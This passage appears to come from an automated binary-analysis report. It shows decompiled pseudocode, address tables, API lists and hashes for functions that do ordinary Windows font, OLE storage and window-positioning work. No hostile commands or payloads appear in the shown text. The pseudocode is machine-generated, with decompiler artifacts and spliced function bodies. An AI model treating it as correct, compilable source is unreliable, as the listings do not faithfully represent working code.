					 *(_t88 - 0x60) =  *(_t88 - 0x37) & 0x000000ff;
					 *(_t88 - 4) = 1;
					 *(_t88 - 0x5c) =  *(_t88 - 0x36) & 0x000000ff;
					__eflags = _t87;
					if(__eflags < 0) {
						_t87 =  ~_t87;
					}
					E012684DC(_t88 - 0x8c, _t83, _t87, __eflags);
					 *(_t88 - 4) = 2;
					_t78 = GetDeviceCaps( *(_t88 - 0x84), 0x5a);
					 *((intOrPtr*)(_t88 - 0x6c)) = 0;
					_t63 = _t87 * 0xafc80;
					_t86 = _t86 + 0x64;
					asm("cdq");
					_t84 = _t63 % _t78;
					 *(_t88 - 0x70) = _t63 / _t78;
					E01273C91(_t86);
					_t66 = _t88 - 0x78;
					__imp__#420(_t66, 0x12a1038, _t86,  *((intOrPtr*)(_t86 + 0x20)));
					__eflags = _t66;
					if(__eflags < 0) {
						 *_t86 = 0;
					}
					 *(_t88 - 4) = 1;
					E0126868F(0, _t88 - 0x8c, _t84, _t86, _t87, __eflags);
					E012615E0( *((intOrPtr*)(_t88 - 0x58)) - 0x10, _t84);
				}
				 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t88 - 0x54)) = 0x129a6cc;
				E01268584(0, _t88 - 0x54, _t86, _t87,  *(_t88 - 4));
				return E01285B5C(0, _t86, _t87);
			}













                                                                                                                0x0127620f
                                                                                                                0x0127620f
                                                                                                                0x0127620f
                                                                                                                0x01276219
                                                                                                                0x0127621e
                                                                                                                0x01276220
                                                                                                                0x01276225
                                                                                                                0x01276228
                                                                                                                0x0127622f
                                                                                                                0x01276234
                                                                                                                0x0127623b
                                                                                                                0x01276243
                                                                                                                0x01276245
                                                                                                                0x0127624a
                                                                                                                0x0127625f
                                                                                                                0x0127625f
                                                                                                                0x00000000
                                                                                                                0x0127624c
                                                                                                                0x0127624e
                                                                                                                0x01276250
                                                                                                                0x01276255
                                                                                                                0x00000000
                                                                                                                0x01276257
                                                                                                                0x01276257
                                                                                                                0x01276257
                                                                                                                0x01276255
                                                                                                                0x01276262
                                                                                                                0x01276262
                                                                                                                0x01276268
                                                                                                                0x0127626b
                                                                                                                0x01276274
                                                                                                                0x0127627b
                                                                                                                0x0127627f
                                                                                                                0x01276287
                                                                                                                0x0127628a
                                                                                                                0x01276291
                                                                                                                0x01276299
                                                                                                                0x012762a1
                                                                                                                0x012762a8
                                                                                                                0x012762af
                                                                                                                0x012762b3
                                                                                                                0x012762b6
                                                                                                                0x012762b8
                                                                                                                0x012762ba
                                                                                                                0x012762ba
                                                                                                                0x012762c5
                                                                                                                0x012762d2
                                                                                                                0x012762dc
                                                                                                                0x012762de
                                                                                                                0x012762e1
                                                                                                                0x012762e7
                                                                                                                0x012762eb
                                                                                                                0x012762ec
                                                                                                                0x012762ee
                                                                                                                0x012762f1
                                                                                                                0x012762fc
                                                                                                                0x01276300
                                                                                                                0x01276306
                                                                                                                0x01276308
                                                                                                                0x0127630a
                                                                                                                0x0127630a
                                                                                                                0x01276312
                                                                                                                0x01276316
                                                                                                                0x01276321
                                                                                                                0x01276321
                                                                                                                0x01276326
                                                                                                                0x0127632d
                                                                                                                0x01276334
                                                                                                                0x0127633e

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01276219
                                                                                                                • GetStockObject.GDI32(00000011), ref: 01276243
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 0127624E
                                                                                                                • GetObjectA.GDI32(012695FE,0000003C,?), ref: 0127626B
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 012762D6
                                                                                                                • OleCreateFontIndirect.OLEAUT32(00000020,012A1038), ref: 01276300
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsCreateDeviceFontH_prolog3_Indirect
                                                                                                                • String ID:
                                                                                                                • API String ID: 721287286-3916222277
                                                                                                                • Opcode ID: ca52a84f6a41c7831273f04f815b1e2c5e70f6ccabb238dcab65876773abbcc0
                                                                                                                • Instruction ID: 90cc15363566c17be44b24441d43a211ce96ecef346a14a1ad401d0b4bb8f63b
                                                                                                                • Opcode Fuzzy Hash: ca52a84f6a41c7831273f04f815b1e2c5e70f6ccabb238dcab65876773abbcc0
                                                                                                                • Instruction Fuzzy Hash: A7316970D1139A9EDF11DFE8C854AADBFB4BF28304F14416AE915AB291EB709A44CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100877D7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindCompleteObject.LIBCMT ref: 100877F8
                                                                                                                • FindMITargetTypeInstance.LIBCMT ref: 10087831
                                                                                                                  • Part of subcall function 10087497: PMDtoOffset.LIBCMT ref: 10087529
                                                                                                                • FindVITargetTypeInstance.LIBCMT ref: 10087838
                                                                                                                • PMDtoOffset.LIBCMT ref: 10087849
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10087872
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10087880
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Find$InstanceOffsetTargetType$CompleteException@8ObjectThrowstd::bad_exception::bad_exception
                                                                                                                • String ID: Bad dynamic_cast!
                                                                                                                • API String ID: 1565299582-2956939130
                                                                                                                • Opcode ID: 3d7885fa45cc7a214f6ee12611f6cae051c6ad2e70823e38419b1191dc3c294f
                                                                                                                • Instruction ID: c1be7923fd3f239791d9277cbf0fe47d94e07cd9909a1131c0177cbbda41206a
                                                                                                                • Opcode Fuzzy Hash: 3d7885fa45cc7a214f6ee12611f6cae051c6ad2e70823e38419b1191dc3c294f
                                                                                                                • Instruction Fuzzy Hash: A821A276E00205EFCB14CFA8CD45AAE7BB4FF48750F11005AF919A7246DB34E960DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01278CFD, Relevance: 12.3, APIs: 8, Instructions: 308memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E01278CFD(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t100;
				signed int _t101;
				void* _t102;
				signed int _t109;
				void _t111;
				intOrPtr _t113;
				long _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void _t122;
				void _t124;
				void* _t126;
				void* _t127;
				void* _t130;
				void* _t131;
				void _t132;
				signed int _t134;
				signed int _t136;
				void* _t137;
				void _t141;
				void* _t142;
				void _t144;
				signed int _t146;
				void* _t151;
				signed int _t153;
				signed int* _t160;
				signed int _t165;
				signed int _t166;
				signed int _t169;
				signed int _t189;
				signed int _t192;
				void* _t193;
				signed int _t200;
				void* _t203;
				intOrPtr* _t206;
				void* _t207;
				intOrPtr _t208;
				void* _t209;
				signed int* _t211;
				void* _t212;

				_push(0x64);
				E01285B7A(E01297E45, __ebx, __edi, __esi);
				_t206 = __ecx;
				 *((intOrPtr*)(_t212 - 0x20)) = __ecx;
				_t96 = 0;
				_t160 = __ecx + 0x50;
				_t203 = 0;
				if( *_t160 != 0) {
					L3:
					 *(_t212 + 8) = _t96;
					 *(_t212 - 0x10) = _t96;
					 *(_t212 + 0x14) = _t96;
					E01279AC2(_t206, _t206 + 0x40);
					_t100 =  *((intOrPtr*)( *_t206 + 0xc0))();
					 *((intOrPtr*)(_t212 - 0x14)) = _t100;
					if(_t100 != 0) {
						L6:
						_t207 =  *(_t212 + 0xc);
						if(_t207 == 0) {
							__eflags =  *(_t212 + 0x10);
							if( *(_t212 + 0x10) != 0) {
								L17:
								_t101 =  *_t160;
								_t193 = _t212 - 0x10;
								_t102 =  *((intOrPtr*)( *_t101))(_t101, 0x12a0ef8, _t193);
								__eflags = _t102;
								if(_t102 < 0) {
									_t208 =  *((intOrPtr*)(_t212 - 0x14));
									L45:
									if(_t203 >= 0) {
										L50:
										_t165 =  *(_t212 + 0x14);
										if(_t165 != 0) {
											 *((intOrPtr*)( *_t165 + 8))(_t165);
										}
										if(_t208 != 0 && _t203 >= 0) {
											_t203 = 1;
										}
										_t103 = _t203;
										L56:
										return E01285B48(_t103);
									}
									L48:
									_t166 =  *_t160;
									if(_t166 != 0) {
										 *((intOrPtr*)( *_t166 + 0x18))(_t166, "true");
										_t109 =  *_t160;
										 *((intOrPtr*)( *_t109 + 8))(_t109);
										 *_t160 =  *_t160 & 0x00000000;
									}
									goto L50;
								}
								__eflags = _t207;
								if(_t207 != 0) {
									__eflags =  *(_t212 + 0x10);
									if( *(_t212 + 0x10) == 0) {
										_t203 = 0x8000ffff;
										L38:
										_t111 =  *(_t212 - 0x10);
										L39:
										 *((intOrPtr*)( *_t111 + 8))(_t111);
										L40:
										if(_t203 < 0) {
											L47:
											_t208 =  *((intOrPtr*)(_t212 - 0x14));
											goto L48;
										}
										_t208 =  *((intOrPtr*)(_t212 - 0x14));
										if(_t208 == 0) {
											_t113 =  *((intOrPtr*)(_t212 - 0x20));
											if(( *(_t113 + 0x70) & 0x00020000) == 0) {
												_t169 =  *_t160;
												_t203 =  *((intOrPtr*)( *_t169 + 0xc))(_t169, _t113 + 0xc8);
											}
										}
										goto L45;
									}
									_t117 =  *((intOrPtr*)( *_t207 + 0x34))();
									 *(_t212 + 0x10) = _t117;
									__eflags = _t193;
									if(__eflags > 0) {
										L30:
										_t203 = 0x8007000e;
										_t209 = 0;
										__eflags = 0;
										L31:
										 *(_t212 - 0x1c) =  *(_t212 - 0x1c) & 0x00000000;
										__eflags = _t209;
										if(_t209 == 0) {
											goto L38;
										}
										_t118 = _t212 - 0x1c;
										__imp__CreateILockBytesOnHGlobal(_t209, "true", _t118);
										_t203 = _t118;
										__eflags = _t203;
										if(_t203 < 0) {
											goto L38;
										}
										_t119 = _t212 - 0x18;
										 *(_t212 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t212 - 0x1c), 0, 0x12, 0, 0, _t119);
										_t203 = _t119;
										__eflags = _t203;
										if(_t203 >= 0) {
											_t122 =  *(_t212 - 0x10);
											_t203 =  *((intOrPtr*)( *_t122 + 0x18))(_t122,  *(_t212 - 0x18));
											_t124 =  *(_t212 - 0x18);
											 *((intOrPtr*)( *_t124 + 8))(_t124);
										}
										_t120 =  *(_t212 - 0x1c);
										L36:
										 *((intOrPtr*)( *_t120 + 8))(_t120);
										goto L38;
									}
									if(__eflags < 0) {
										L27:
										_t126 = GlobalAlloc(0, _t117);
										 *(_t212 + 0xc) = _t126;
										__eflags = _t126;
										if(_t126 == 0) {
											goto L30;
										}
										_t127 = GlobalLock(_t126);
										__eflags = _t127;
										if(_t127 == 0) {
											goto L30;
										}
										 *((intOrPtr*)( *_t207 + 0x38))(_t127,  *(_t212 + 0x10));
										_t209 =  *(_t212 + 0xc);
										GlobalUnlock(_t209);
										goto L31;
									}
									__eflags = _t117 - 0xffffffff;
									if(_t117 >= 0xffffffff) {
										goto L30;
									}
									goto L27;
								}
								_t130 = _t212 + 0xc;
								 *(_t212 + 0xc) = _t207;
								__imp__CreateILockBytesOnHGlobal(_t207, "true", _t130);
								_t203 = _t130;
								__eflags = _t203;
								if(_t203 < 0) {
									goto L38;
								}
								_t131 = _t212 + 0x10;
								 *(_t212 + 0x10) = _t207;
								__imp__StgCreateDocfileOnILockBytes( *(_t212 + 0xc), 0x1012, _t207, _t131);
								_t203 = _t131;
								__eflags = _t203;
								if(_t203 >= 0) {
									_t132 =  *(_t212 - 0x10);
									_t203 =  *((intOrPtr*)( *_t132 + 0x14))(_t132,  *(_t212 + 0x10));
									_t134 =  *(_t212 + 0x10);
									 *((intOrPtr*)( *_t134 + 8))(_t134);
								}
								_t120 =  *(_t212 + 0xc);
								goto L36;
							}
							L12:
							_t136 =  *_t160;
							_t196 = _t212 + 8;
							_t137 =  *((intOrPtr*)( *_t136))(_t136, 0x12a1018, _t212 + 8);
							__eflags = _t137;
							if(_t137 < 0) {
								goto L17;
							}
							__eflags = _t207;
							if(__eflags != 0) {
								E01274F1F(_t160, _t212 - 0x70, _t196, _t203, _t207, __eflags);
								 *(_t212 - 4) =  *(_t212 - 4) & 0x00000000;
								E01281B76(_t212 - 0x28, _t212 - 0x70);
								_t141 =  *(_t212 + 8);
								_t142 =  *((intOrPtr*)( *_t141 + 0x14))(_t141, _t212 - 0x28, _t207, "true", 0x1000, 0);
								_t44 = _t212 - 4;
								 *_t44 =  *(_t212 - 4) | 0xffffffff;
								__eflags =  *_t44;
								_t203 = _t142;
								E0127502F(_t160, _t212 - 0x70, _t212 - 0x28, _t203, _t207,  *_t44);
							} else {
								_t144 =  *(_t212 + 8);
								_t203 =  *((intOrPtr*)( *_t144 + 0x20))(_t144);
							}
							_t111 =  *(_t212 + 8);
							goto L39;
						}
						if( *(_t212 + 0x10) != 0) {
							goto L17;
						}
						_t146 =  *_t160;
						_push(_t212 + 0x14);
						_push(0x12a1008);
						_push(_t146);
						if( *((intOrPtr*)( *_t146))() < 0) {
							goto L12;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t207 + 0x54))() == 0) {
							goto L12;
						} else {
							 *(_t212 + 0x10) =  *(_t212 + 0x10) & 0x00000000;
							_t151 =  *((intOrPtr*)( *_t207 + 0x54))(0, 0xffffffff, _t212 + 0x10, _t212 + 0xc);
							_t189 =  *(_t212 + 0x14);
							_t203 =  *((intOrPtr*)( *_t189 + 0x14))(_t189,  *(_t212 + 0x10), _t151);
							_t153 =  *(_t212 + 0x14);
							 *((intOrPtr*)( *_t153 + 8))(_t153);
							 *(_t212 + 0x14) =  *(_t212 + 0x14) & 0x00000000;
							goto L40;
						}
					}
					_t200 =  *_t160;
					_t211 = _t206 + 0x70;
					 *((intOrPtr*)( *_t200 + 0x58))(_t200, "true", _t211);
					if(( *_t211 & 0x00020000) == 0) {
						goto L6;
					}
					_t192 =  *_t160;
					_t203 =  *((intOrPtr*)( *_t192 + 0xc))(_t192,  *((intOrPtr*)(_t212 - 0x20)) + 0xc8);
					if(_t203 < 0) {
						goto L47;
					}
					goto L6;
				}
				_t203 = E0127CDA8(0, __ecx,  *(_t212 + 8), 0, 3, 0x12a0f48, _t160,  *(_t212 + 0x14));
				if(_t203 < 0) {
					goto L56;
				} else {
					_t96 = 0;
					goto L3;
				}
			}












































                                                                                                                0x01278cfd
                                                                                                                0x01278d04
                                                                                                                0x01278d09
                                                                                                                0x01278d0b
                                                                                                                0x01278d0e
                                                                                                                0x01278d10
                                                                                                                0x01278d13
                                                                                                                0x01278d17
                                                                                                                0x01278d39
                                                                                                                0x01278d39
                                                                                                                0x01278d3e
                                                                                                                0x01278d41
                                                                                                                0x01278d48
                                                                                                                0x01278d51
                                                                                                                0x01278d57
                                                                                                                0x01278d5c
                                                                                                                0x01278d8f
                                                                                                                0x01278d8f
                                                                                                                0x01278d94
                                                                                                                0x01278dfe
                                                                                                                0x01278e02
                                                                                                                0x01278e6e
                                                                                                                0x01278e6e
                                                                                                                0x01278e70
                                                                                                                0x01278e7c
                                                                                                                0x01278e7e
                                                                                                                0x01278e80
                                                                                                                0x01278fc8
                                                                                                                0x01278fcb
                                                                                                                0x01278fcd
                                                                                                                0x01278fed
                                                                                                                0x01278fed
                                                                                                                0x01278ff2
                                                                                                                0x01278ff7
                                                                                                                0x01278ff7
                                                                                                                0x01278ffc
                                                                                                                0x01279004
                                                                                                                0x01279004
                                                                                                                0x01279005
                                                                                                                0x01279007
                                                                                                                0x0127900c
                                                                                                                0x0127900c
                                                                                                                0x01278fd4
                                                                                                                0x01278fd4
                                                                                                                0x01278fd8
                                                                                                                0x01278fdf
                                                                                                                0x01278fe2
                                                                                                                0x01278fe7
                                                                                                                0x01278fea
                                                                                                                0x01278fea
                                                                                                                0x00000000
                                                                                                                0x01278fd8
                                                                                                                0x01278e86
                                                                                                                0x01278e88
                                                                                                                0x01278edf
                                                                                                                0x01278ee3
                                                                                                                0x01278f91
                                                                                                                0x01278f96
                                                                                                                0x01278f96
                                                                                                                0x01278f99
                                                                                                                0x01278f9c
                                                                                                                0x01278f9f
                                                                                                                0x01278fa1
                                                                                                                0x01278fd1
                                                                                                                0x01278fd1
                                                                                                                0x00000000
                                                                                                                0x01278fd1
                                                                                                                0x01278fa3
                                                                                                                0x01278fa8
                                                                                                                0x01278faa
                                                                                                                0x01278fb4
                                                                                                                0x01278fb6
                                                                                                                0x01278fc4
                                                                                                                0x01278fc4
                                                                                                                0x01278fb4
                                                                                                                0x00000000
                                                                                                                0x01278fa8
                                                                                                                0x01278eed
                                                                                                                0x01278ef0
                                                                                                                0x01278ef3
                                                                                                                0x01278ef5
                                                                                                                0x01278f30
                                                                                                                0x01278f30
                                                                                                                0x01278f35
                                                                                                                0x01278f35
                                                                                                                0x01278f37
                                                                                                                0x01278f37
                                                                                                                0x01278f3b
                                                                                                                0x01278f3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278f3f
                                                                                                                0x01278f46
                                                                                                                0x01278f4c
                                                                                                                0x01278f4e
                                                                                                                0x01278f50
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278f54
                                                                                                                0x01278f60
                                                                                                                0x01278f63
                                                                                                                0x01278f69
                                                                                                                0x01278f6b
                                                                                                                0x01278f6d
                                                                                                                0x01278f6f
                                                                                                                0x01278f7b
                                                                                                                0x01278f7d
                                                                                                                0x01278f83
                                                                                                                0x01278f83
                                                                                                                0x01278f86
                                                                                                                0x01278f89
                                                                                                                0x01278f8c
                                                                                                                0x00000000
                                                                                                                0x01278f8c
                                                                                                                0x01278ef7
                                                                                                                0x01278efe
                                                                                                                0x01278f01
                                                                                                                0x01278f07
                                                                                                                0x01278f0a
                                                                                                                0x01278f0c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278f0f
                                                                                                                0x01278f15
                                                                                                                0x01278f17
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278f21
                                                                                                                0x01278f24
                                                                                                                0x01278f28
                                                                                                                0x00000000
                                                                                                                0x01278f28
                                                                                                                0x01278ef9
                                                                                                                0x01278efc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278efc
                                                                                                                0x01278e8a
                                                                                                                0x01278e8d
                                                                                                                0x01278e94
                                                                                                                0x01278e9a
                                                                                                                0x01278e9c
                                                                                                                0x01278e9e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278ea4
                                                                                                                0x01278ea7
                                                                                                                0x01278eb4
                                                                                                                0x01278eba
                                                                                                                0x01278ebc
                                                                                                                0x01278ebe
                                                                                                                0x01278ec0
                                                                                                                0x01278ecc
                                                                                                                0x01278ece
                                                                                                                0x01278ed4
                                                                                                                0x01278ed4
                                                                                                                0x01278ed7
                                                                                                                0x00000000
                                                                                                                0x01278ed7
                                                                                                                0x01278e04
                                                                                                                0x01278e04
                                                                                                                0x01278e06
                                                                                                                0x01278e12
                                                                                                                0x01278e14
                                                                                                                0x01278e16
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278e18
                                                                                                                0x01278e1a
                                                                                                                0x01278e36
                                                                                                                0x01278e3b
                                                                                                                0x01278e46
                                                                                                                0x01278e4b
                                                                                                                0x01278e55
                                                                                                                0x01278e58
                                                                                                                0x01278e58
                                                                                                                0x01278e58
                                                                                                                0x01278e5f
                                                                                                                0x01278e61
                                                                                                                0x01278e1c
                                                                                                                0x01278e1c
                                                                                                                0x01278e25
                                                                                                                0x01278e25
                                                                                                                0x01278e66
                                                                                                                0x00000000
                                                                                                                0x01278e66
                                                                                                                0x01278d9a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278da0
                                                                                                                0x01278da5
                                                                                                                0x01278da6
                                                                                                                0x01278dab
                                                                                                                0x01278db2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278db8
                                                                                                                0x01278db9
                                                                                                                0x01278dba
                                                                                                                0x01278dbb
                                                                                                                0x01278dc4
                                                                                                                0x00000000
                                                                                                                0x01278dc6
                                                                                                                0x01278dcb
                                                                                                                0x01278dda
                                                                                                                0x01278ddd
                                                                                                                0x01278dea
                                                                                                                0x01278dec
                                                                                                                0x01278df2
                                                                                                                0x01278df5
                                                                                                                0x00000000
                                                                                                                0x01278df5
                                                                                                                0x01278dc4
                                                                                                                0x01278d5e
                                                                                                                0x01278d60
                                                                                                                0x01278d69
                                                                                                                0x01278d72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278d74
                                                                                                                0x01278d85
                                                                                                                0x01278d89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01278d89
                                                                                                                0x01278d2d
                                                                                                                0x01278d31
                                                                                                                0x00000000
                                                                                                                0x01278d37
                                                                                                                0x01278d37
                                                                                                                0x00000000
                                                                                                                0x01278d37

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 01278D04
                                                                                                                  • Part of subcall function 0127CDA8: SysStringLen.OLEAUT32(?), ref: 0127CDB0
                                                                                                                  • Part of subcall function 0127CDA8: CoGetClassObject.OLE32(?,?,00000000,012A0EC8,?), ref: 0127CDCE
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(?,?,?), ref: 01278E94
                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,?,00000000), ref: 01278EB4
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 01278F01
                                                                                                                • GlobalLock.KERNEL32 ref: 01278F0F
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 01278F28
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,?,00000000), ref: 01278F46
                                                                                                                • StgOpenStorageOnILockBytes.OLE32(00000000,00000000,00000012,00000000,00000000,?), ref: 01278F63
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 317715441-0
                                                                                                                • Opcode ID: 7623be9d9e25fd214b933f1bb4db3c6206a9b4a311c6eb25574ec7591f3a149f
                                                                                                                • Instruction ID: f104f90eb7f69e69d2b03ed02cd6e9930cb13bb2cb85288b67a684cdaccb258b
                                                                                                                • Opcode Fuzzy Hash: 7623be9d9e25fd214b933f1bb4db3c6206a9b4a311c6eb25574ec7591f3a149f
                                                                                                                • Instruction Fuzzy Hash: 0FB16871620216AFDB15CF68C848BAF7BBABF48720F144558FA05DB290DB71E941CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127A39B, Relevance: 12.3, APIs: 8, Instructions: 252windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E0127A39B(intOrPtr __ecx, intOrPtr* __edx, void* __edi, int _a8) {
				signed int _v8;
				struct tagRECT _v24;
				void* _v29;
				struct tagRECT _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				RECT* _v56;
				intOrPtr _v60;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v89;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t86;
				intOrPtr _t88;
				signed int _t90;
				int _t100;
				long _t110;
				intOrPtr* _t115;
				signed int _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				signed int _t123;
				signed int _t133;
				intOrPtr _t158;
				intOrPtr _t159;
				intOrPtr* _t165;
				signed int _t171;
				intOrPtr* _t172;
				intOrPtr* _t180;
				signed int _t190;
				void* _t191;
				intOrPtr _t192;
				RECT* _t193;
				signed int _t197;
				signed int _t198;
				signed int _t199;

				_t188 = __edi;
				_t186 = __edx;
				_t160 = __ecx;
				_t86 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t86 ^ _t197;
				_t158 = __ecx;
				_push(__edi);
				_t88 =  *((intOrPtr*)(__ecx + 4));
				if(_t88 == 0) {
					L20:
					E01268275(_t160);
					asm("int3");
					_push(_t197);
					_t198 = _t199;
					_t90 =  *0x12aa3f0; // 0xddd5d539
					_v72 = _t90 ^ _t198;
					_push(_t158);
					_t159 = _v60;
					_push(_t192);
					_t193 = _v56;
					_v88 = 0;
					_v84 = 0;
					_v80 = 0;
					_v76 = 0;
					E01269011( &_v89,  *((intOrPtr*)(_t159 - 0xb0)));
					__eflags = _t193;
					if(_t193 != 0) {
						IntersectRect( &(_v40.bottom), _t193, _t159 - 0x9c);
						EqualRect( &(_v40.bottom), _t193);
					} else {
						_t193 = _t159 - 0x9c;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t188 = _t188;
					}
					_t100 = IsRectEmpty( &(_v40.bottom));
					__eflags = _t100;
					if(_t100 == 0) {
						_t100 = InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0xac)) + 0x20)) + 0x20),  &(_v40.bottom), _a8);
					}
					E01269AE8(_t100);
					__eflags = _v24.bottom ^ _t198;
					return E012833E5(_t159, _v24.bottom ^ _t198, _t186, _t188, _t193);
				} else {
					_t160 =  *((intOrPtr*)(_t88 + 0x28));
					if( *((intOrPtr*)(_t88 + 0x28)) == 0) {
						goto L20;
					} else {
						_t192 = E0126B5A0(_t160, __edi);
						_v48 = _t192;
						if(_t192 == 0) {
							goto L20;
						} else {
							IsWindowVisible( *(_t192 + 0x20));
							asm("sbb edi, edi");
							_t110 = 0;
							_v24.left = _t110;
							_v24.top = _t110;
							_v24.right = _t110;
							_v24.bottom = _t110;
							_t190 = __edi + 1;
							if(_t190 != 0) {
								_v40.left = _t110;
								_v40.top = _t110;
								_v40.right = _t110;
								_v40.bottom.left = _t110;
								GetWindowRect( *(E0126B33E(_t158, _t160, _t186, GetDesktopWindow()) + 0x20),  &_v40);
								GetWindowRect( *(_v48 + 0x20),  &_v24);
								asm("cdq");
								asm("cdq");
								E0126F9B4(_v48, _v40.right - _v40.left - _t186 >> 1, _v40.bottom.left - _v40.top - _t186 >> 1, 0, 0, 0);
								E0126FC09(_v48, "true");
							}
							_t26 = _t158 + 0x48; // 0x48
							_t194 = _t26;
							_push(_t194);
							_push(0x129b930);
							_t165 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 4)) + 0x50));
							_push(_t165);
							if( *((intOrPtr*)( *_t165))() < 0) {
								_t186 =  &_v52;
								_t115 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 4)) + 0x50));
								_t116 =  *((intOrPtr*)( *_t115))(_t115, 0x129b920,  &_v52);
								__eflags = _t116;
								if(_t116 >= 0) {
									_t118 = _v52;
									_t186 =  &_v44;
									 *((intOrPtr*)( *_t118 + 0x14))(_t118,  &_v44);
									_t120 = _v52;
									 *((intOrPtr*)( *_t120 + 8))(_t120);
									_t171 = _v44;
									__eflags = _t171;
									if(_t171 != 0) {
										_t50 = _t158 + 8; // 0x8
										_t123 =  *((intOrPtr*)( *_t171))(_t171, 0x12a0e68, _t50);
										_t172 = _v44;
										_t194 = _t123;
										_t186 =  *_t172;
										 *((intOrPtr*)( *_t172 + 8))(_t172);
										__eflags = _t123;
										if(__eflags >= 0) {
											_t186 =  *((intOrPtr*)(_t158 + 8));
											_t54 = _t158 + 0xc; // 0xc
											_t195 =  *_t186;
											 *( *_t186)(_t186, 0x12a0e78, _t54);
											goto L16;
										}
										goto L18;
									} else {
									}
								}
							} else {
								_t180 =  *_t194;
